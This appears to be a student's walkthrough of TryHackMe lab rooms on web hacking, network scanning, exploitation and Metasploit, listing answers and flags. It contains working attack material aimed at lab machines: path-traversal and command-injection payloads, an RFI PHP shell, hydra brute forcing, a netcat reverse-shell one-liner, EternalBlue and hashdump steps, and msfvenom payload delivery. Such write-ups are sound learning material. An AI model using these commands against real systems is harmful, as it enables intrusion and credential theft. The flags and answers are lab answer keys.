Introduction to Pentesting

Fundamentals

The steps a penetration tester takes during an engagement is known as the methodology. The stages generally used in the methodology are -

1. Information Gathering
2. Enumeration/Scanning
3. Exploitation
4. Privilege Escalation
5. Post-Exploitation

There are many open-source databases out there, like AbuseIPDB, and Cisco Talos Intelligence, where you can perform a reputation and location check for the IP address.

Frameworks like Open Source Security Testing Methodology (OSSTMM) and Open Web Application Security Project (OWASP) are great frameworks to follow for testing. There are also others like NIST Cybersecurity Framework 1.1, NCSC Cyber Assessment Framework (CAF).

There are 3 scopes in testing an application depending on your knowledge of the target. They are Black-Box, Grey-Box, and White-Box Testing.

CIA Triad is a security model kept in mind throughout while creating security policy. CIA Triad stands for Confidentiality, Integrity and Availability (CIA).

Introduction to Web Hacking

Walking An Application

After starting the machine and connecting using the VPN Configuration provided we will start solving these challenges.

Viewing The Page Source

1. As mentioned in the comments on the top of the HTML Page after viewing the page source of the Homepage, go to the address /new-home-beta

   https://IP.p.thmlabs.com/new-home-beta
   THM{HTML_COMMENTS_ARE_DANGEROUS}
   

2. On the /secret-page address you will find the next flag

   https://IP.p.thmlabs.com/secret-page
   THM{NOT_A_SECRET_ANYMORE}
   

3. When you visit the /assets address you can view the directory listings. There is a flag.txt present there

   https://IP.p.thmlabs.com/assets/flag.txt
   THM{INVALID_DIRECTORY_PERMISSIONS}
   

4. When you visit the https://static-labs.tryhackme.cloud/sites/thm-web-framework website and go to the changelog, it is mentioned in version 1.3 changes that there is a file tmp.zip accessible to users. Go and download the file by going to the /tmp.zip address and there is a flag inside.

   https://IP.p.thmlabs.com/tmp.zip
   THM{KEEP_YOUR_SOFTWARE_UPDATED}
   

Developer Tools - Inspector

Go to the premium article on the news webpage and on the paywall right click and select inspect. Right-click the premium-customer-blocker div and select delete node. The flag will be visible now.

THM{NOT_SO_HIDDEN}

Developer Tools - Debugger

Go to the Contact page and put a breakpoint on the flash[’remove’] line in the debugger. You can see the flag written there.

Developer Tools - Network

Go to Contact Page and send a message with the network tab open. After sending the message select the contact-msg event in the Network Tab. The flag is in the AJAX Response to the request.

THM{GOT_AJAX_FLAG}

Content Discovery

What is Content Discovery?

What is the Content Discovery method that begins with M?

Manually

What is the Content Discovery method that begins with A?

Automated

What is the Content Discovery method that begins with O?

OSINT

Manual Discovery

What is the directory in the robots.txt that isn’t allowed to be viewed by web crawlers?

Go to robots.txt web address and check the Disallow attribute -

/staff-portal

Manual Discovery - Favicon

What framework did the favicon belong to?

Go to the mentioned website - https://static-labs.tryhackme.cloud/sites/favicon/ and go the page source and open the favicon.ico file. Copy the web address for the icon path and put this command in curl.

curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum

I got the MD5 Hash ‘f276b19aabcb4ae8cda4d22625c6735f’. We will cross check it with the OWASP Database. The framework is:

cgiirc

Manual Discovery - Sitemap.xml

What is the path of the secret area that can be found in the sitemap.xml file?

/s3cr3t-area

Manual Discovery - HTTP Headers

What is the flag value from the X-FLAG header?

Run curl with -v flag

THM{HEADER_FLAG}

Manual Discovery - Framework Stack

Go to the documentation page. As mentioned on their page go to http://IP/thm-framework-login

THM{CHANGE_DEFAULT_CREDENTIALS}

OSINT - Google Hacking / Dorking

What Google dork operator can be used to only show results from a particular site?

site:

OSINT - Wappalyzer

What online tool can be used to identify what technologies a website is running?

wappalyzer

OSINT - Wayback Machine

What is the website address for the Wayback Machine?

https://archive.org/web/

OSINT - GitHub

What is Git?

version control system

OSINT - S3 Buckets

What URL format do Amazon S3 buckets end in?

.s3.amazonaws.com

Automated Discovery

Run the dirbusters command

dirb http://10.10.142.122/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

Subdomain Enumeration

Three different subdomain enumeration methods: Brute Force, OSINT (Open-Source Intelligence) and Virtual Host.

What is a subdomain enumeration method beginning with B?

Brute Force

What is a subdomain enumeration method beginning with O?

OSINT

What is a subdomain enumeration method beginning with V?

Virtual Host

OSINT - SSL/TLS Certificates

To discover subdomains using Certificate Transparency Logs we can sites like http://crt.sh/ and https://ui.ctsearch.entrust.com/ui/ctsearchui

What domain was logged on crt.sh at 2020-12-26?

store.tryhackme.com

OSINT - Search Engines

“-site:www.domain.com site:*.domain.com” would only contain results leading to the domain name domain.com but exclude any links to www.domain.com; therefore, it shows us only subdomain names belonging to domain.com.

What is the TryHackMe subdomain beginning with B  discovered using the above Google search?

blog.tryhackme.com

DNS Bruteforce

What is the first subdomain found with the dnsrecon tool?

api.acmeitsupport.thm

OSINT - Sublist3r

What is the first subdomain discovered by sublist3r?

web55.acmeitsupport.thm

Virtual Hosts

Because web servers can host multiple websites from one server when a website is requested from a client, the server knows which website the client wants from the Host  header. We can utilise this host header by making changes to it and monitoring the response to see if we’ve discovered a new website.

What is the first subdomain discovered?

delta

What is the second subdomain discovered?

yellow

Authentication Bypass

Username Enumeration

What is the username starting with si*** ?

simon

What is the username starting with st*** ?

steve

What is the username starting with ro**** ?

robert

Brute Force

What is the valid username and password (format: username/password)?

steve/thunder

Logic Flaw

Create a user account on acme support registration page and run the curl commands. Once you receive the password reset token go to that webpage and visit the Support Tokens. The flag should be there.

THM{AUTH_BYPASS_COMPLETE} 

Cookie Tampering

What is the flag from changing the plain text cookie values?

THM{COOKIE_TAMPERING}

What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

Go to https://crackstation.net/ and put in the value

463729

What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

THM{BASE64_ENCODING}

Encode the following value using base64 {“id”:1,“admin”:true}

eyJpZCI6MSwiYWRtaW4iOnRydWV9Cg==

IDOR

IDOR stands for Insecure Direct Object Reference

An IDOR Example

Change the order ID from 1234 to 1000 on the order invoice web address

THM{IDOR-VULN-FOUND}

Finding IDORs in Encoded IDs

What is a common type of encoding used by websites?

base64

Finding IDORs in Hashed IDs

What is a common algorithm used for hashing IDs?

md5

Finding IDORs in Unpredictable IDs

What is the minimum number of accounts you need to create to check for IDORs between accounts?

2

A Practical IDOR Example

What is the username for user id 1?

adam84

What is the email address for user id 3?

j@fakemail.thm

File Inclusion

Path Traversal

What function causes path traversal vulnerabilities in PHP?

file_get_contents

Local File Inclusion - LFI

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

/lab1.php?file=/etc/passwd

In Lab #2, what is the directory specified in the include function?

includes

Local File Inclusion - LFI#2

It seems we could move out of the PHP directory but still, the include function reads the input with .php at the end! This tells us that the developer specifies the file type to pass to the include function. To bypass this scenario, we can use the NULL BYTE, which is %00.

NOTE: the %00 trick is fixed and not working with PHP 5.3.4 and above.

To bypass filtering of sensitive file names, NULL BYTE or current directory trick can be used - http://webapp.thm/index.php?lang=/etc/passwd/.

Give Lab #3 a try to read /etc/passwd. What is the request look like?

Try it in the address bar as it is being URL encoded in the input form

lab3.php?file=../../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

file_get_contents

For Lab 5 - lab5.php?file=….//….//….//….//etc/passwd

Try out Lab #6 and check what is the directory that has to be in the input field?

THM-profile

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

file=THM-profile/../../../../etc/os-release
12.04

Remote File Inclusion - RFI

One requirement for RFI is that the allow_url_fopen option needs to be on.

The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server.

Challenge

Capture Flag1 at /etc/flag1

curl -d "file=../../../etc/flag1" -X POST http://IP/challenges/chall1.php
F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

Change the cookie from Guest to '../../../../etc/flag2%00'
c00k13_i5_yuMmy1

Capture Flag3 at /etc/flag3

curl -d "file=../../../etc/flag3%00" -X POST http://IP/challenges/chall3.php --output -
P0st_1s_w0rk1in9

Gain RCE in Lab #Playground  /playground.php with RFI to execute the hostname command. What is the output?

Create a hostnames.php file on your machine with the code

<?php echo shell_exec("hostname");?>

Then start a python simple HTTP server with

python3 -m http.server 80
# Then on the playground use http://InternalTHMIPAddress:80/hostnames.php
lfi-vm-thm-f8c5b1a78692

SSRF

SSRF stands for Server Side Request Forgery. Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

2 types - Blind SSRF(No information returned) and Regular SSRF(Information returned).

SSRF Examples

What is the flag from the SSRF Examples site?

https://website.thm/item/2?server=server.website.thm/flag?id=9&x=
THM{SSRF_MASTER}

Finding an SSRF

Places to find SSRF -

1. Full URL in the address bar
2. Hidden values in the form
3. Partial URL
4. Path of the URL int the URL

What website can be used to catch HTTP requests from a server?

requestbin.com

Defeating Common SSRF Defenses

What method can be used to bypass strict rules?

open redirect

What IP address may contain sensitive data in a cloud environment?

169.254.169.254

What type of list is used to permit only certain input?

allow list

What type of list is used to stop certain input?

deny list

SSRF Practical

What is the flag from the /private directory?

THM{YOU_WORKED_OUT_THE_SSRF}

Cross-Site Scripting

XSS Payloads

Which document property could contain the user’s session token?

document.cookie

Which JavaScript method is often used as a Proof Of Concept?

alert

Reflected XSS

Where in an URL is a good place to test for reflected XSS?

parameter

Stored XSS

How are stored XSS payloads usually stored on a website?

database

DOM Based XSS

What unsafe JavaScript method is good to look for in source code?

eval()

Blind XSS

What tool can you use to test for Blind XSS?

xsshunter

What type of XSS is very similar to Blind XSS?

stored xss

Perfecting your payload

An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.

What is the flag you received from level six?

THM{XSS_MASTER}

Practical Example (Blind XSS)

What is the value of the staff-session cookie?

4AB305E55955197693F01D6F8FD2D321

Command Injection

Discovering Command Injection

What variable stores the user’s input in the PHP code snippet in this task?

$title

What HTTP method is used to retrieve data submitted by a user in the PHP code snippet?

GET

If I wanted to execute the id command in the Python code snippet, what route would I need to visit?

/id

Exploiting Command Injection

What payload would I use if I wanted to determine what user the application is running as?

whoami

What popular network tool would I use to test for blind command injection on a Linux  machine?

ping

What payload would I use to test a Windows machine for blind command injection?

timeout

Remediating Command Injection

What is the term for the process of “cleaning” user input that is provided to an application?

sanitisation

Practical: Command Injection (Deploy)

What user is this application running as?

127.0.0.1 && whoami
www-data

What are the contents of the flag located in /home/tryhackme/flag.txt?

127.0.0.1 && cat /home/tryhackme/flag.txt
THM{COMMAND_INJECTION_COMPLETE}

SQL Injection

What does SQL stand for?

structured query language

What is a Database?

What is the acronym for the software that controls a database?

dbms

What is the name of the grid-like structure which holds the data?

table

What is SQL?

What SQL statement is used to retrieve data?

select

What SQL clause can be used to retrieve data from multiple tables?

union

What SQL statement is used to add data?

insert

What is SQL Injection

What character signifies the end of an SQL query?

;

In-Band SQLi

What is the flag after completing level 1?

THM{SQL_INJECTION_3840}

Blind SQLi - Authentication Bypass

What is the flag after completing level two? (and moving to level 3)

THM{SQL_INJECTION_9581}

Blind SQLi - Boolean Based

What is the flag after completing level three?

THM{SQL_INJECTION_1093}

Blind SQLi - Time Based

What is the final flag after completing level four?

THM{SQL_INJECTION_MASTER}

Out-of-Band SQLi

Name a protocol beginning with D that can be used to exfiltrate data from a database.

DNS

Remediation

Name a method of protecting yourself from an SQL Injection exploit.

prepared statement

Burp Suite

What is Burp Suite?

Which edition of Burp Suite will we be using in this module?

burp suite community

Which edition of Burp Suite runs on a server and provides constant scanning for target web apps?

burp suite enterprise

Burp Suite is frequently used when attacking web applications and ______ applications.

mobile

Features of Burpsuite

Which Burp Suite feature allows us to intercept requests between ourselves and the target?

proxy

Which Burp tool would we use if we wanted to bruteforce a login form?

intruder

Options

In which Project options sub-tab can you find reference to a “Cookie jar”?

sessions

In which User options sub-tab can you change the Burp Suite update behaviour?

misc

What is the name of the section within the User options “Misc” sub-tab which allows you to change the Burp Suite keybindings?

hotkeys

If we have uploaded Client-Side TLS certificates in the User options tab, can we override these on a per-project basis (Aye/Nay)?

aye

There are many more configuration options available. Take the time to read through them.

In the next section, we will cover the Burp Proxy – a much more hands-on aspect of the room.

Introduction to the Burp Proxy

Which button would we choose to send an intercepted request to the target in Burp Proxy?

forward

[Research]  What is the default keybind for this?

ctrl+f

Connecting through the Proxy (FoxyProxy)

There is one particularly useful option that allows you to intercept and modify the response to your request.

What is this option?

response to this request

Site Map and Issue Definitions

Take a look around the site on http://10.10.166.98/ – we will be using this a lot throughout the module. Visit every page linked to from the homepage, then check your sitemap – one endpoint should stand out as being very unusual!

Visit this in your browser (or use the “Response” section of the site map entry for that endpoint). What is the flag you receive?

Click around on the homepage and then check the site map.

THM{NmNlZTliNGE1MWU1ZTQzMzgzNmFiNWVk}

Look through the Issue Definitions list. What is the typical severity of a Vulnerable JavaScript dependency?

low

Burp Suite: Repeater

Repeater Views

Which view option displays the response in the same format as your browser would?

render

Practical Example

Send the request. What is the flag you receive?

THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}

Practical Challenge

What is the flag you receive when you cause a 500 error in the endpoint?

Pass in -1 as the number endpoint in the request

GET /products/-1 HTTP/1.1
THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl}

SQLi with Repeater

Exploit the union SQL injection vulnerability in the site.

What is the flag?

Path - /about/0 UNION ALL SELECT notes,null,null,null,null from people where id ="1"
THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh} None

Burp Suite: Intruder

What is Intruder?

Which section of the Options sub-tab allows you to control what information will be captured in the Intruder results?

attack results

In which Intruder sub-tab can we define the “Attack type” for our planned attack?

positions

Attack Types - Sniper

If you were using Sniper to fuzz three parameters in a request, with a wordlist containing 100 words, how many requests would Burp Suite need to send to complete the attack?

requests = numberOfWords * numberOfPositions (100 * 3)

300

How many sets of payloads will Sniper accept for conducting an attack?

1

Sniper is good for attacks where we are only attacking a single parameter, aye or nay?

aye

Attack Types - Battering Ram

What would the body parameters of the first request that Burp Suite sends be?

username=admin&password=admin

Attack Type - Pitchfork

Like running multiple sniper attackers with multiple payloads.

What is the maximum number of payload sets we can load into Intruder in Pitchfork mode?

20

Attack Types - Cluster Bomb

We have three payload sets. The first set contains 100 lines; the second contains 2 lines; and the third contains 30 lines.

How many requests will Intruder make using these payload sets in a Cluster Bomb attack?

Requests = 100 * 2 * 30
6000

Intruder - Payloads

Which payload type lets us load a list of words into a payload set?

simple list

Which Payload Processing rule could we use to add characters at the end of each payload in the set?

add suffix

Practical - Challenge

Which attack type is best suited for this task?

sniper

Configure an appropriate position and payload (the tickets are stored at values between 1 and 100), then start the attack.

Either using the Response tab in the Attack Results window or by looking at each successful (i.e. 200 code) request manually in your browser, find the ticket that contains the flag.

What is the flag?

Ticket 83 has the flag
THM{MTMxNTg5NTUzMWM0OWRlYzUzMDVjMzJl}

Burp Suite: Other Modules

Decoder - Encoding/Decoding

Base64 encode the phrase: Let's Start Simple. What is the base64 encoded version of this text?

TGV0J3MgU3RhcnQgU2ltcGxl

URL Decode this data: %4e%65%78%74%3a%20%44%65%63%6f%64%69%6e%67.

Next: Decoding

Use Smart Decode to decode this data: %34%37.

47

Encode this phrase: Encoding Challenge.

Start with base64 encoding. Take the output of this and convert it into ASCII Hex. Finally, encode the hex string into octal.

24034214a720270024142d541357471232250253552c1162d1206c

Decoder - Hashing

Using Decoder, what is the SHA-256 hashsum of the phrase: Let's get Hashing!?

Convert this into an ASCII Hex string for the answer to this question.

6b72350e719a8ef5af560830164b13596cb582757437e21d1879502072238abe

Generate an MD4 hashsum of the phrase: Insecure Algorithms.

Encode this as base64 (not ASCII Hex) before submitting.

TcV4QGZZN7y7lwYFRMMoeA==

“Some joker has messed with my SSH key! There are four keys in the directory, and I have no idea which is the real one. The MD5 hashsum for my key is 3166226048d6ad776370dc105d40d9f8 – could you find it for me?”

Submit the correct key name as your answer.

key3

Network Security

Passive Reconnaissance

Passive Versus Active Recon

You visit the Facebook page of the target company, hoping to get some of their employee names. What kind of reconnaissance activity is this?

p

You ping the IP address of the company webserver to check if ICMP traffic is blocked. What kind of reconnaissance activity is this?

a

You happen to meet the IT administrator of the target company at a party. You try to use social engineering to get more information about their systems and network infrastructure. What kind of reconnaissance activity is this?

a

whois

When was TryHackMe.com registered?

20180705

What is the registrar of TryHackMe.com?

namecheap.com

Which company is TryHackMe.com using for name servers?

cloudflare.com

nslookup and dig

Check the TXT records of thmlabs.com. What is the flag there?

THM{a5b83929888ed36acb0272971e438d78}

DNSDumpster

Lookup tryhackme.com on DNSDumpster. What is one interesting subdomain that you would discover in addition to www and blog?

remote

Shodan.io

According to Shodan.io, what is the 2nd country in the world in terms of the number of publicly accessible Apache servers?

Search for Apache on Shodan

germany

Based on Shodan.io, what is the 3rd most common port used for Apache?

8080

Based on Shodan.io, what is the 3rd most common port used for nginx?

8888

Active Reconnaissance

Web Browser

Browse to the following website and ensure that you have opened your Developer Tools on AttackBox Firefox, or the browser on your computer. Using the Developer Tools, figure out the total number of questions.

Inspect the page and go to script.js in sources.

8

Ping

Which option would you use to set the size of the data carried by the ICMP echo request?

-s

What is the size of the ICMP header in bytes?

8

Does MS Windows Firewall block ping by default? (Y/N)

y

Deploy the VM for this task and using the AttackBox terminal, issue the command ping -c 10 10.10.254.202. How many ping replies did you get back?

10

Traceroute

In Traceroute A, what is the IP address of the last router/hop before reaching tryhackme.com?

172.67.69.208

In Traceroute B, what is the IP address of the last router/hop before reaching tryhackme.com?

104.26.11.229

In Traceroute B, how many routers are between the two systems?

26

Telnet

Start the attached VM from Task 3 if it is not already started. On the AttackBox, open the terminal and use the telnet client to connect to the VM on port 80. What is the name of the running server?

apache

What is the version of the running server (on port 80 of the VM)?

2.4.10

Netcat

Start the VM and open the AttackBox. Once the AttackBox loads, use Netcat to connect to the VM port 21. What is the version of the running server?

0.17

Nmap Live Host Discovery

Subnetworks

How many devices can see the ARP Request?

(2 Devices, 1 Switch and Router)

4

Did computer6 receive the ARP Request? (Y/N)

N

From: Computer4 → Computer4

How many devices can see the ARP Request?

4

Did computer6 reply to the ARP Request? (Y/N)

Y

Enumerating Targets

What is the first IP address Nmap would scan if you provided 10.10.12.13/29  as your target?

10.10.12.13 → (binary) 00001010.00001010.00001100.00001| (29 bits are fixed) 101

(We can only change these 3 bits so the first address would be 000 which comes to 10.10.12.8)

10.10.12.8

How many IP addresses will Nmap scan if you provide the following range 10.10.0-255.101-125?

6400

Discovering Live Hosts

What is the type of packet that computer1 sent before the ping?

arp request

What is the type of packet that computer1 received before being able to send the ping?

arp response

How many computers responded to the ping request?

1

What is the name of the first device that responded to the first ARP  Request?

router

What is the name of the first device that responded to the second ARP Request?

computer5

Send another Ping Request. Did it require new ARP Requests? (Y/N)

No, because the router has stored already logged the MAC and IP Address of computer5 during the first request.

N

Nmap Host Discovery Using ARP

We run nmap -PR -sn MACHINE_IP/24 to discover all the live systems on the same subnet as our target machine.

How many devices are you able to discover using ARP requests?

Only 3 that are in the same subnet

3

Nmap Host Discovery Using ICMP

In an attempt to discover live hosts using ICMP address mask queries, we run the command nmap -PM -sn MACHINE_IP/24.

Nmap uses timestamp request (ICMP Type 13) and checks whether it will get a Timestamp reply (ICMP Type 14). Adding the -PP option tells Nmap to use ICMP timestamp requests.

nmap -PP -sn MACHINE_IP/24 .

In the example below, we scanned the target’s subnet using nmap -PE -sn MACHINE_IP/24. This scan will send ICMP echo packets to every IP address on the subnet. Again, we expect live hosts to reply;

What is the option required to tell Nmap to use ICMP Timestamp to discover live hosts?

-PP

What is the option required to tell Nmap to use ICMP Address Mask to discover live hosts?

-PM

What is the option required to tell Nmap to use ICMP Echo to discover life hosts?

-PE

Nmap Host Discovery Using TCP and UDP

TCP SYN Discovery - PS nmap -PS(PORTNUMBER) -sn MACHINE_IP/24

TCP ACK Discovery - PA sudo nmap -PA -sn MACHINE_IP/24

TCP UDP Ping - PU sudo nmap -PU -sn MACHINE_IP/24

Which TCP ping scan does not require a privileged account?

TCP SYN Ping

Which TCP ping scan requires a privileged account?

TCP ACK Ping

What option do you need to add to Nmap to run a TCP SYN ping scan on the telnet port?

Telnet works on port 23

-PS23

Use Reverse-DNS Lookup

We want Nmap to issue a reverse DNS lookup for all the possibles hosts on a subnet, hoping to get some insights from the names. What option should we add?

-R

Nmap Basic Port Scans

TCP and UDP Ports

Which service uses UDP port 53 by default?

DNS

Which service uses TCP port 22 by default?

SSH

How many port states does Nmap consider?

6

Which port state is the most interesting to discover as a pentester?

open

TCP Flags

What 3 letters represent the Reset flag?

RST

Which flag needs to be set when you initiate a TCP connection (first packet of TCP 3-way handshake)?

SYN

TCP Connect Scan

-sT (TCP Connect Scan)

-F For fast scan mode

Launch the VM. Open the AttackBox and execute nmap -sT 10.10.99.196 via the terminal. A new service has been installed on this VM since our last scan. Which port number was closed in the scan above but is now open on this target VM?

110

What is Nmap’s guess about the newly installed service?

pop3

TCP SYN Scan

-sS TCP SYN Scan for Ports

Launch the VM. Some new server software has been installed since the last time we scanned it. On the AttackBox, use the terminal to execute nmap -sS 10.10.48.80 . What is the new open port?

6667

What is Nmap’s guess of the service name?

irc

UDP Scan

-sU for UDP Scan

Launch the VM. On the AttackBox, use the terminal to execute nmap -sU -F -v 10.10.97.0. A new service has been installed since the last scan. What is the UDP  port that is now open?

53

What is the service name according to Nmap?

domain

Fine-Tuning Scope and Performance

What is the option to scan all the TCP ports between 5000 and 5500?

-p5000-5500

How can you ensure that Nmap will run at least 64 probes in parallel?

--min-parallelism 64

What option would you add to make Nmap very slow and paranoid?

-T0

Nmap Post Port Scans

Server Detection

What is the detected version for port 143?

Dovecot imapd

Which service did not have a version detected with --version-light?

rpcbind

OS Detection and Traceroute

What OS did Nmap detect?

linux

Nmap Scripting Engine (NSE)

Knowing that Nmap scripts are saved in /usr/share/nmap/scripts on the AttackBox. What does the script http-robots.txt check for?

disallowed entries

Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE2015-2015-1635)?

http-vuln-cve2015-1635

Run Nmap with the default scripts -sC against IP. You will notice that there is a service listening on port 53. What is its full version value?

9.9.5-9+deb8u19-Debian

What is the name of the key exchange algorithms (kex_algorithms) that relies upon “sha1” and is supported by IP?

diffie-hellman-group14-sha1

Saving the Output

Check the attached Nmap logs. How many systems are listening on the HTTPS port?

I used the command:

grep -c 443 scan_172_17_network.gnmap
3

What is the IP address of the system listening on port 8089?

grep 8089 scan_172_17_network.gnmap
172.17.20.147

Protocols and Servers

Telnet

To which port will the telnet command with the default parameters try to connect?

23

Hyper Text Transfer Protocol (HTTP)

Launch the attached VM. From the AttackBox terminal, connect using Telnet to 10.10.33.125 80 and retrieve the file flag.thm. What does it contain?

THM{e3eb0a1df437f3f97a64aca5952c8ea0}

File Transfer Protocol (FTP)

Using an FTP client, connect to the VM and try to recover the flag file. What is the flag?

THM{364db6ad0e3ddfe7bf0b1870fb06fbdf}

Simple Mail Transfer Protocol (SMTP)

Using the AttackBox terminal, connect to the SMTP port of the target VM. What is the flag that you can get?

THM{5b31ddfc0c11d81eba776e983c35e9b5}

Post Office Protocol 3 (POP3)

Connect to the VM at the POP3 port. Authenticate using the username frank and password D2xc9CgD. What is the response you get to STAT?

+OK 0 0

How many email messages are available to download via POP3 on ?

0

Internet Message Access Protocol (IMAP)

What is the default port used by IMAP?

143

Protocols and Server 2

Sniffing Attack

What do you need to add to the command sudo tcpdump to capture only Telnet traffic?

port 23

What is the simplest display filter you can use with Wireshark to show only IMAP traffic?

imap

Man-in-the-Middle (MITM) Attack

How many different interfaces does Ettercap offer?

3

In how many ways can you invoke Bettercap?

3

Transport Layer Security (TLS)

DNS can also be secured using TLS. What is the three-letter acronym of the DNS protocol that uses TLS?

DoT

Secure Shell (SSH)

Use SSH to connect to 10.10.133.108 as markwith the password XBtc49AB. Using uname -r, find the Kernel release?

5.4.0-84-generic

Use SSH to download the file book.txt from the remote system. How many KBs did scp display as download size?

415

Password Attack

We learned that one of the email accounts is lazie. What is the password used to access the IMAP service on IP?

butterfly

Net Sec Challenge

Challenge Questions

What is the highest port number being open less than 10,000?

sudo nmap -sT -p1-10000 -Pn IP [From port 1 to 10000 only port scan]

8080

There is an open port outside the common 1000 ports; it is above 10,000. What is it?

sudo nmap -sT -p1-65535 -Pn IP [Increase the IP Range]

10021

How many TCP ports are open?

6

What is the flag hidden in the HTTP server header?

Send a Telnet GET request to / on port 80 of the server.

THM{web_server_25352}

What is the flag hidden in the SSH server header?

Send a Telnet connection request to port 22 of the server.

THM{946219583339}

We have an FTP server listening on a nonstandard port. What is the version of the FTP server?

Send a Telnet connection request to port 10021 of the server.

vsFTPd 3.0.3

We learned two usernames using social engineering: Eddieand quinn. What is the flag hidden in one of these two account files and accessible via FTP?

The userlist.txt file contains the username found through social engineering eddie and quinn.

hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt 10.10.8.62 -s 10021 ftp

Login with these passwords to the FTP server on port 10021. The flag is in quinn’s directory. You can download by using the get (filename) command.

THM{321452667098}

Browsing to http://IP:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

nmap -f -sN IP [Fragmented packets and no port scan]

THM{f7443f99}

Vulnerability Research

Vulnerabilities 101

An attacker has been able to upgrade the permissions of their system account from “user” to “administrator”. What type of vulnerability is this?

operating system

You manage to bypass a login panel using cookies to authenticate. What type of vulnerability is this?

application logic

Scoring Vulnerabilities (CVSS & VPR)

What year was the first iteration of CVSS published?

2005

If you wanted to assess vulnerability based on the risk it poses to an organisation, what framework would you use?

VPR

If you wanted to use a framework that was free and open-source, what framework would that be?

CVSS

Vulnerability Databases

Using NVD, how many CVEs were submitted in July 2021?

1585

Who is the author of Exploit-DB?

Offensive Security

An Example of Finding a Vulnerability

What type of vulnerability did we use to find the name and version of the application in this example?

version disclosure

Showcase: Exploiting Ackme’s Application

Follow along with the showcase of exploiting ACKme’s application to the end to retrieve a flag. What is this flag?

THM{ACKME_ENGAGEMENT}

Exploit Vulnerabilities

Automated Vs. Manual Vulnerability Research

You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay)

yay

You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this?

injection

You manage to impersonate another user. What vulnerability is this?

broken access control

Finding Manual Exploits

What website would you use as a security researcher if you wanted to upload a Proof of Concept?

github

You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?

searchsploit

Example of Manual Exploitation

What type of vulnerability was used in this attack?

remote code execution

Practical: Manual Exploitation

Find out the version of the application that is running. What are the name and version number of the application?

online book store v1.0

Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine.

You can find the exploit at -
https://www.exploit-db.com/exploits/47887
Download the exploit and change it to to 47887.py file. 
Run the exploit using 
python3 47887.py http://IP

Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?

THM{BOOK_KEEPING}

Vulnerability Capstone

Exploit the Machine (Flag Submission)

What is the name of the application running on the vulnerable machine?

fuel cms

What is the version number of this application?

1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application?

CVE-2018-16763

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

The exploit for Fuel CMS 1.4.1 for RCE can be found here -

https://gist.githubusercontent.com/kriss-u/8e1b44b1f4e393cf0d8a69117227dbd2/raw/4419f8dc7090a41c7ebc96048daf67c43c1996a3/exploit.py

Open a netcat listener on the Attack Box.

As mentioned here - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet We can get a reverse shell to Netcat using this command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attack Box IP] [Netcat listener port] >/tmp/f

THM{ACKME_BLOG_HACKED}

Metasploit

Introduction

Main Components of Metasploit

What is the name of the code taking advantage of a flaw on the target system?

Exploit

What is the name of the code that runs on the target system to achieve the attacker’s goal?

Payload

What are self-contained payloads called?

singles

Is “windows/x64/pingback_reverse_tcp” among singles or staged payload?

singles

Msfconsole

How would you search for a module related to Apache?

search apache

Who provided the auxiliary/scanner/ssh/ssh_login module?

Can be found by running the command

info auxiliary/scanner/ssh/ssh_login
todb

Working with modules

How would you set the LPORT value to 6666?

set LPORT 6666

How would you set the global value for RHOSTS  to 10.10.19.23 ?

set RHOSTS 10.10.19.23

What command would you use to clear a set payload?

unset payload

What command do you use to proceed with the exploitation phase?

exploit

Metasploit: Exploitation

Scanning

How many ports are open on the target system?

Do the following steps in msfconsole

use auxiliary/scanner/portscan/tcp
set RHOSTS TARGET_IP
exploit
Ans - 5

Using the relevant scanner, what NetBIOS name can you see?

use auxiliary/scanner/netbios/nbname
set RHOSTS TARGET_IP
exploit
Ans - ACME IT SUPPORT

What is running on port 8000?

webfs/1.21

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

use auxiliary/scanner/smb/smb_login
set RHOSTS Target_IP
set SMBUser penny
set PASS_FILE /usr/share/wordlists/metasploit/MetasploitWordlist.txt
exploit
Ans - leo1234

Vulnerability Scanning

Who wrote the module that allows us to check SMTP servers for the open relay?

Campbell Murray

Exploitation

Exploit one of the critical vulnerabilities on the target VM

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET_IP
set LHOST Internal_IP
exploit

What is the content of the flag.txt file?

In meterpreter

search -f flag.txt
cd to the directory C:\Users\Jon\Documents
cat flag.txt
Ans - THM-5455554845

What is the NTLM hash of the password of the user “pirate”?

In meterpreter

hashdump
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
Ans - 8ce9a3ebd1647fcc5e04025019f4b875

Msfvenom

Steps -

# On the Attack Box 
sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.6.29.56 LPORT=4444 -f elf > rev_shell.elf
# Run a Python Server to serve the created payload to the victim
python3 -m http.server 9000
# Open msfconsole to use the multi/handler
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.6.29.56
set LPORT 4444
run

# You will get a meterpreter session after running the .elf file by giving it 
